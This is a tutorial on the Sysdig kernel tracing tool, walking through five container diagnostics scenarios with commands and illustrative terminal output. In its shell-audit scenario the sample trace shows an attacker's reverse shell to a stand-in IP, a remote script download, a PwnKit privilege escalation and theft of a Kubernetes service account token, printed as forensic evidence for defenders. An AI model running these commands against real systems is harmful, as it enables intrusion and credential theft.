Sysdig: Intercepting Containerised Syscall Streams, Diagnosing Microservice Latency Anomalies, and Orchestrating Live Production Forensics
In modern containerised infrastructure, traditional diagnostic tools hit a hard brick wall. When dozens of microservices, virtual namespaces, and container runtimes share the same underlying operating system, conventional utilities like top or iotop only see blurred averages or isolated fragments. They cannot tell you which specific container is thrashing an NVMe drive, why a compiled Go binary is stalling on network sockets, or what exact HTTP payload triggered an unhandled exception inside a stripped container.
To pierce through these layers of abstraction, you need an instrument that acts as a universal flight recorder and digital stethoscope for the Linux kernel itself. Rather than asking individual applications to explain their own failures through custom logging or intrusive debuggers, you need an engine that intercepts every fundamental interaction between software and hardware in real time. That tool is Sysdig.
The fastest way to see Sysdig in action is to deploy its process inspection chisel, which cuts across all container boundaries to expose your system's heaviest CPU consumers in a single shot:
sysdig -c topprocs_cpu
Within moments, the terminal delivers a unified, high-altitude view of your system's resource consumption, mapping raw Linux process IDs directly to their enclosing Kubernetes pods and container names:
CPU% Process PID Container
--------------------------------------------------------------------------------
24.12% envoy 184920 k8s_istio-proxy_ingress-gw-7f4c_default
12.05% mysqld 21034 k8s_db_mysql-cluster-primary-0_storage
4.88% java 94811 k8s_checkout_payment-service-v2_prod
1.20% containerd 1102 host
0.44% sysdig 241901 host
What It Does in Plain English
Sysdig operates as a non-intrusive flight recorder for the Linux operating system. Every time an application reads a file, opens a network connection, spawns a thread, or sends data across a socket, it must ask the Linux kernel for permission via a system call. Sysdig taps directly into this conversation.
Because it sits beneath the containers rather than inside them, Sysdig requires zero code modifications, zero language-specific profilers, and no invasive instrumentation. It pairs this deep kernel vantage point with real-time awareness of container runtimes (such as Docker, containerd, and CRI-O) and Kubernetes metadata, translating cryptic numeric process IDs into human-readable service names, pod labels, and payload streams.
Architectural Mechanics: Kernel Probes, State Engines, and Chisels
To understand how Sysdig achieves forensic depth without crushing production performance, it helps to examine its three primary architectural pillars:
1. The Kernel Event Capture Layer (libscap)
At the lowest level, Sysdig intercepts execution via one of two mechanisms: a modern, universal Linux Kernel eBPF probe (scap-bpf) or a traditional dynamic kernel module (sysdig-probe.ko). Both tap directly into the Linux kernel's system call tracepoints (sys_enter and sys_exit). When any thread triggers a system callβsuch as opening a file descriptor or initiating a network handshakeβthe probe records the arguments, return values, timing, and thread context.
Crucially, this telemetry is written into per-CPU circular, lockless memory buffers. This decoupled, asynchronous model ensures that the overhead on production workloads remains negligible (typically under two percent CPU utilisation), as critical kernel execution paths never block while waiting for user-space tools to read the data.
2. The State Engine and Container Metadata (libsinsp)
Raw system calls can be cryptic; an isolated file descriptor integer such as fd: 7 reveals nothing about the actual file path or the IP address at the end of a socket. The user-space library libsinsp continuously ingests the raw stream from libscap to reconstruct an active, in-memory state table of the operating system.
It tracks process lineage, thread states, open file descriptor tables, and network connection states. Concurrently, libsinsp talks to local container runtimes and the Kubernetes API via UNIX domain sockets, enriching raw Linux system calls in real time with operational context: container identifiers, image repositories, pod names, namespaces, and custom labels.
3. The Chisel Scripting Engine
While raw event filtering is ideal for surgical debugging, engineers often need aggregated metrics on the fly. Sysdig solves this through Chiselsβmodular, event-driven scripts written in Lua that subscribe to filtered slices of the event pipeline. Chisels calculate top I/O consumers, compute latency percentiles, reconstruct application streams, and render visual latency spectrograms directly in your terminal. This foundational architecture also underpins modern cloud-native runtime security tools, such as the Falco Runtime Security Engine.
Core Flags and Operational Parameters
Sysdig commands combine operational flags, formatting directives, and boolean filter expressions. The table below outlines the core parameters you will use most frequently:
| Flag | Parameter Syntax | Purpose and Behaviour |
|---|---|---|
-c |
-c <chisel_name> |
Executes a built-in or custom Lua Chisel script for aggregated metric analysis. |
-w |
-w <trace.scap> |
Streams raw binary kernel events directly into a file for post-incident triage. |
-r |
-r <trace.scap> |
Reads, replays, and filters a previously captured binary trace dump offline. |
-p |
-p "<format_string>" |
Customises output lines using contextual tokens (e.g. "%evt.time %proc.name %fd.name"). |
-s |
-s <snaplen_bytes> |
Sets data buffer capture size (default: 80 bytes; use 4096+ for complete payload inspection). |
-A |
-A or --print-ascii |
Decodes binary byte buffers into readable ASCII text while stripping unprintable characters. |
-e |
-e or --ebpf |
Forces Sysdig to load the non-module eBPF probe on locked or immutable kernel distributions. |
-l |
-l or --list |
Lists all available event fields, filter variables, and installed Chisel scripts. |
Five Real-World Production Use Cases
1. Intercepting Live HTTP/gRPC Payloads and Latencies Without Code Changes
The Scenario
An internal payment microservice running inside an isolated Kubernetes pod is intermittently returning 502 Bad Gateway errors to upstream ingress proxies. The application is compiled as a stripped Go binary with no local debugging symbols, application logs do not capture raw request bodies, and mutual TLS terminates at an upstream sidecar. You must inspect the unencrypted HTTP/1.1 or gRPC plaintext payload transmitted across the internal container loopback socket and calculate exact server processing latency.
The Exact Command
sysdig -s 4096 -A -p "*%evt.time [%container.name] %proc.name (%proc.pid) > %evt.type | Latency: %evt.latency.ms ms | %fd.name\nPayload: %evt.buffer" "evt.type in (read, write) and fd.port=8080 and container.name=payment-service and evt.buflen > 0"
Realistic Terminal Output
*02:18:41.109281 [payment-service] payment-svc (94811) > read | Latency: 0.04 ms | 127.0.0.1:41920->127.0.0.1:8080
Payload: POST /v2/charge HTTP/1.1
Host: payment-service:8080
User-Agent: Go-http-client/1.1
Content-Length: 138
Content-Type: application/json
Accept-Encoding: gzip
{"account_id": "acc_881920", "amount": 4200, "currency": "GBP", "idempotency_key": "7f8b91a2-c3d4-4e5f", "gateway_route": "stripe_eu_direct"}
*02:18:43.614890 [payment-service] payment-svc (94811) > write | Latency: 2505.51 ms | 127.0.0.1:41920->127.0.0.1:8080
Payload: HTTP/1.1 504 Gateway Timeout
Content-Type: application/json; charset=utf-8
Date: Thu, 20 Aug 2026 02:18:43 GMT
Content-Length: 72
{"error": "upstream_database_timeout", "detail": "connection pool exhausted"}
Line-by-Line Breakdown
-s 4096: Expands the per-event data buffer capture from the 80-byte default to 4096 bytes, preventing truncation of HTTP headers and JSON bodies.-A: Directs Sysdig to decode binary byte buffers into readable ASCII text.-p "*%evt.time ...": Formats output to show timestamps, container context, system call latency in milliseconds (%evt.latency.ms), socket endpoints (%fd.name), and payload contents (%evt.buffer)."evt.type in (read, write) ...": Limits evaluation toreadandwritesyscalls on port8080targetingpayment-service, while filtering out empty zero-byte polling events (evt.buflen > 0).
The Sysadmin Action
The output proves that the payment service took 2505.51 ms before returning an internal 504 Gateway Timeout due to database connection pool exhaustion. The engineer can instantly dismiss network transport issues and proceed directly to increasing database pool capacity and tuning upstream connection timeouts.
2. Tracing Saturated File Descriptors and Disk I/O Thrashing in Multi-Tenant Nodes
The Scenario
A shared multi-tenant cluster node hosting fifty containers experiences severe I/O wait (%iowait > 45%). Storage throughput drops to zero, and NVMe disk latency escalates. Standard tools like iotop fail to pinpoint the offending process because multiple applications are writing through the Linux Page Cache via asynchronous kernel flush threads.
The Exact Command
First, identify the top file I/O consumer across all containers:
sysdig -c topfiles_bytes "container.name != host"
Then, trace the offending container's write operations in real time:
sysdig -p "%evt.time [%container.name] %proc.name (PID:%proc.pid) %evt.type bytes=%evt.info %fd.name" "evt.type in (write, writev, pwrite64) and fd.type=file and container.name=analytics-worker"
Realistic Terminal Output
From the initial Chisel analysis:
Bytes Filename Container
--------------------------------------------------------------------------------
1.84GB /data/tmp/scratch_sort_9918.tmp k8s_worker_analytics-worker-5bc9_tenant-b
12.40MB /var/log/nginx/access.log k8s_proxy_api-gateway-748d_production
4.18MB /var/lib/mysql/ibdata1 k8s_db_orders-db-0_production
From the granular descriptor trace:
02:24:11.890112 [analytics-worker] duckdb (18491) write bytes=4194304 /data/tmp/scratch_sort_9918.tmp
02:24:11.894220 [analytics-worker] duckdb (18491) write bytes=4194304 /data/tmp/scratch_sort_9918.tmp
02:24:11.898301 [analytics-worker] duckdb (18491) write bytes=4194304 /data/tmp/scratch_sort_9918.tmp
02:24:11.902410 [analytics-worker] duckdb (18491) write bytes=4194304 /data/tmp/scratch_sort_9918.tmp
Line-by-Line Breakdown
sysdig -c topfiles_bytes "container.name != host": Runs thetopfiles_bytesChisel to aggregate total read/write bytes per file path, excluding host-level operating system processes.sysdig -p ...: Monitors specific write calls (write,writev,pwrite64) on physical files (fd.type=file) tied exclusively tocontainer.name=analytics-worker.
The Sysadmin Action
The trace exposes an embedded analytics engine (duckdb inside analytics-worker) dumping an unindexed temporary sort file (scratch_sort_9918.tmp) directly onto the shared root disk in 4MB unbuffered writes. The sysadmin must apply ephemeral-storage resource limits to the pod specification and remount temporary scratch locations to an isolated tmpfs RAM disk.
3. Auditing Interactive Shell Sessions and Privilege Escalation in Ephemeral Containers
The Scenario
Security monitoring detects unexpected outbound traffic from a hardened, supposedly immutable frontend Nginx container. You need to establish whether an attacker achieved remote code execution, track which user account ran the shell, and reconstruct the exact command sequence and privilege changes executed within the container.
The Exact Command
Run the interactive user session audit chisel:
sysdig -c spy_users "container.name=frontend-nginx"
Or capture full process lineage and command-line execution arguments:
sysdig -p "%evt.time UID=%user.uid(%user.name) GID=%group.gid [%container.name] %proc.pname -> %proc.name (%proc.cmdline)" "evt.type=execve and container.name=frontend-nginx"
Realistic Terminal Output
02:31:02.140811 UID=33(www-data) GID=33 [frontend-nginx] nginx -> sh (sh -c /bin/bash -i >& /dev/tcp/198.51.100.42/4444 0>&1)
02:31:05.819203 UID=33(www-data) GID=33 [frontend-nginx] sh -> bash (bash -i)
02:31:12.441092 UID=33(www-data) GID=33 [frontend-nginx] bash -> whoami (whoami)
02:31:18.902318 UID=33(www-data) GID=33 [frontend-nginx] bash -> curl (curl -s http://198.51.100.42/linpeas.sh -o /tmp/lp.sh)
02:31:21.018440 UID=33(www-data) GID=33 [frontend-nginx] bash -> chmod (chmod +x /tmp/lp.sh)
02:31:24.512901 UID=0(root) GID=0 [frontend-nginx] lp.sh -> pwnkit (/tmp/CVE-2021-4034)
02:31:26.110294 UID=0(root) GID=0 [frontend-nginx] pwnkit -> id (id)
02:31:30.881920 UID=0(root) GID=0 [frontend-nginx] bash -> cat (cat /run/secrets/kubernetes.io/serviceaccount/token)
Line-by-Line Breakdown
-c spy_users: Runs the TTY tracking Chisel to display interactive keystrokes and shell commands executed across users.-p "%evt.time UID=%user.uid ...": Creates an audit stream listing the user ID, parent process (%proc.pname), spawned binary (%proc.name), and complete arguments (%proc.cmdline)."evt.type=execve ...": Captures every instance of the execve(2) system call family within the target container.
The Sysadmin Action
The output provides definitive evidence of an initial shell spawned under UID 33 (www-data), followed by root escalation via a local exploit (CVE-2021-4034) and theft of the Kubernetes service account token. The sysadmin must immediately:
1. Cordon and isolate the affected cluster node.
2. Terminate the compromised pod (kubectl delete pod frontend-nginx-... --now).
3. Invalidate and rotate the compromised Kubernetes service account credentials.
4. Update the pod security policy to enforce readOnlyRootFilesystem: true and runAsNonRoot: true.
4. Triaging Hanging System Calls and Socket Bottlenecks Across High-Concurrency Services
The Scenario
An asynchronous API Gateway running on Java/Netty suffers severe request stalls during peak traffic. Application threads appear locked in WAITING states, garbage collection pauses have been ruled out, and incoming client requests are being dropped. You must pinpoint which kernel synchronisation primitives or network socket calls are holding worker threads hostage.
The Exact Command
Identify the slowest system calls executed by the gateway process:
sysdig -c bottlenecks "proc.name=java and container.name=api-gateway"
Then generate a latency distribution spectrogram across key synchronisation and network primitives:
sysdig -c spectrogram "evt.type in (futex, epoll_wait, connect, accept) and proc.name=java"
Realistic Terminal Output
From the bottlenecks Chisel:
Time Latency Process PID Event Details
--------------------------------------------------------------------------------------------------------
02:38:10.419012 1892.41ms java (epoll) 4102 connect(fd=128, 10.96.42.18:5432)
02:38:11.890119 1204.18ms java (epoll) 4103 connect(fd=134, 10.96.42.18:5432)
02:38:12.110294 2041.88ms java (epoll) 4104 connect(fd=141, 10.96.42.18:5432)
02:38:14.501928 3109.12ms java (worker-1) 4108 futex(uaddr=0x7f8b91a240c0, FUTEX_WAIT_PRIVATE)
From the Spectrogram Chisel:
Latency Range Event Count Distribution
--------------------------------------------------------------------------------
< 1us [========================================] (84,912)
1us - 10us [=================== ] (41,209)
10us - 100us [== ] (4,110)
100us - 1ms [ ] (312)
1ms - 10ms [ ] (84)
10ms - 100ms [ ] (12)
100ms - 1s [= ] (1,842)
> 1s [== ] (3,419)
Line-by-Line Breakdown
-c bottlenecks: Filters for system calls whose execution time exceeds typical operational latency thresholds (defaulting to events taking longer than 1000ms).-c spectrogram: Groups target system calls into logarithmic latency buckets, rendering an immediate visual distribution of kernel wait times.evt.type in (futex, epoll_wait, connect, accept): Restricts analysis to kernel thread synchronisation (futex) and network socket management primitives.
The Sysadmin Action
The telemetry highlights two clear issues: outgoing connect(2) calls to the backend database (10.96.42.18:5432) are stalling for up to two seconds (indicating TCP SYN queue saturation), which subsequently causes worker threads to pile up behind internal mutex locks (futex wait states). The engineer must increase connection queue limits (net.core.somaxconn = 65535), scale database pool capacity, and investigate backend database listener health.
5. Recording Compressed Binary Trace Dumps (.scap) for Deterministic Offline Forensics
The Scenario
A critical billing engine crashes with an intermittent segmentation fault (SIGSEGV) once every few days under high throughput. The bug cannot be reproduced in staging environments. Attaching live debuggers like gdb in production adds substantial overhead and alters execution timings enough to hide the race condition. You must maintain a lightweight rolling flight recorder on the host so that when the crash recurs, the preceding events are preserved in a compact .scap file for offline inspection.
The Exact Command
Start a rolling, compressed ring buffer capture on the production node:
sysdig -w /var/log/traces/node_forensic_%Y%m%d_%H%M%S.scap -G 120 -W 5 -C 200 -z "proc.name=billing-engine or evt.type=sigkill"
Replay and interrogate the captured trace on an offline development workstation:
sysdig -r /var/log/traces/node_forensic_incident.scap -p "%evt.time [%proc.name (PID:%proc.pid)] %evt.type(%evt.args) -> res=%evt.res" "proc.name=billing-engine and evt.type in (mmap, mprotect, brk, signal, sigaction, kill)"
Realistic Terminal Output (Replay Phase)
02:44:01.109281 [billing-engine (PID:89401)] mprotect(addr=0x7f10a4000000, len=65536, prot=PROT_READ|PROT_WRITE) -> res=0
02:44:01.109312 [billing-engine (PID:89401)] mmap(addr=0x0, len=1048576, prot=PROT_READ|PROT_WRITE, flags=MAP_PRIVATE|MAP_ANONYMOUS, fd=-1, offset=0) -> res=0x7f10a3f00000
02:44:01.110419 [billing-engine (PID:89401)] mprotect(addr=0x7f10a3f00000, len=1048576, prot=PROT_READ) -> res=0
02:44:01.111802 [billing-engine (PID:89401)] write(fd=12, data="[ERROR] Segfault reading memory at 0x7f10a3f01020") -> res=56
02:44:01.112004 [kernel (PID:0)] signal(sig=SIGSEGV, info=0x0) -> res=0
02:44:01.112110 [systemd (PID:1)] wait4(pid=89401, options=0) -> res=89401
Line-by-Line Breakdown
-w ... -G 120 -W 5 -C 200 -z: Streams binary trace files with rotation every 120 seconds (-G), keeping a maximum rolling window of 5 files (-W), capping individual files at 200MB (-C), and applying on-the-fly gzip compression (-z).-r <trace.scap>: Reads and evaluates the recorded binary capture offline, unlocking the complete filter engine and Chisel ecosystem without placing load on production systems.
The Sysadmin Action
Offline trace inspection reveals that at 02:44:01.110419, the application set its heap segment permissions to PROT_READ via mprotect(2), and then attempted an illegal memory write to 0x7f10a3f01020 one millisecond later, triggering a SIGSEGV. The development team can use these exact virtual addresses and syscall sequences to fix the concurrent memory management routine.
What Can Go Wrong: Operational Hazards and Remediation
While Sysdig is significantly safer than legacy debugging tools like strace or gdb, running kernel-level instrumentation on high-throughput hosts carries specific operational considerations:
| Operational Risk | Root Cause | Observable Symptom | Remediation Strategy |
|---|---|---|---|
| Ring Buffer Drops | High syscall frequency overwhelms user-space reader process. | Sysdig reports n drops on standard error; missing events in timeline. |
Increase buffer sizes via -B 33554432 (32MB) and apply kernel-level filter expressions so unwanted events are discarded before crossing into user space. |
| Disk Exhaustion | Unbounded payload dumps (-s 0 or large -s) writing to root storage. |
Host runs out of disk space on /var; container runtimes crash. |
Always enforce rotation limits (-W), file size caps (-C), interval limits (-G), and compression (-z). Direct output to dedicated scratch mounts. |
| Module Load Failures | Immutable distributions (e.g. Bottlerocket, Flatcar) blocking DKMS compilation. | Startup failure with insmod or kernel module signature verification errors. |
Use the eBPF probe engine via the -e flag or set SYSDIG_BPF_PROBE="". Ensure CONFIG_BPF=y and CONFIG_BPF_EVENTS=y are enabled in your kernel. Consult the ArchWiki Sysdig Manual for advanced configuration. |
Today's Takeaway
If you do only one thing with Sysdig today, open a terminal on your primary Linux development host or staging node and execute sysdig -c topprocs_net. Within five seconds, you will see a live, aggregated breakdown of every active process and container establishing network connections, sending bytes, and negotiating sockets. In that single command, you will witness the invisible operational machinery of your system crystallise into immediate clarity.